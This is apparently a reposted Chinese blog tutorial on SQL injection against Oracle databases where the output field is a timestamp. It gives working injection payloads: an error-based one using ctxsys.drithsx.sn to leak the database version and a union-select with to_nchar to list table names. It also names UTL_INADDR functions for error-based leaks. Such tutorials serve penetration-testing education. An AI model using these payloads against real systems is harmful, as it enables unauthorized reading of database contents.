当前位置:网站首页>对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
2022-07-31 05:10:00 【不习惯有你】
注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关。
解决方法:
1.盲注
2.尝试报错注入
and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))
3.尝试去转化类型
to_nchar 转化为varchar或varchar2类型
用法to_nchar(table_name)
and 1=2 union select null,null,to_nchar(table_name),null from user_tables
4.通过函数对字符处理转化为数字
切割字符串,转数字看回显
由于有字数要求,我看了一些其他的报错函数
1.UTL_INADDR.get_host_address环境中IP地址
具体用法:select UTL_INADDR.get_host_address('www.qq.com') from dual;
2.UTL_INADDR.get_host_name返回环境中主机名
具体用法:
返回局域网内指定IP地址的主机名
select UTL_INADDR.get_host_name('192.168.0.156') from dual;
返回intrenet中指定IP地址的网址
select UTL_INADDR.get_host_name('219.153.50.84') from dual;
可以查看相关的内容Oracle显错注入函数_小明哥哥的技术博客_51CTO博客
边栏推荐
猜你喜欢
![【JS面试题】面试官:“[1,2,3].map(parseInt)“ 输出结果是什么?答上来就算你通过面试](/img/7a/c70077c7a95137aaeb49c344c82696.png)
随机推荐
tf.keras.utils.pad_sequences()
剑指offer专项突击版 ---第 5 天
C语言实验五 循环结构程序设计(二)
tf.keras.utils.get_file()
C语言教程(二)-printf及c自带的数据类型
Distributed transaction processing solution big PK!
Redis管道技术/分区
Sword Point Offer Special Assault Edition ---- Day 2
剑指offer基础版 --- 第24天
闭包(五)----一个常见的循环
关于LocalDateTime的全局返回时间带“T“的时间格式处理
C语言实验三 选择结构程序设计
07 【内置指令 自定义指令】
解决响应式数据依赖响应式数据无响应问题
The interviewer asked me how to divide the database and the table?Fortunately, I summed up a set of eight-part essays
三次握手与四次挥手
对list集合进行分页,并将数据显示在页面中
torch.normal function usage
Interviewer: If the order is not paid within 30 minutes, it will be automatically canceled. How to do this?
gin框架学习-Gin框架和Gorm框架搭建一个简单的API微服务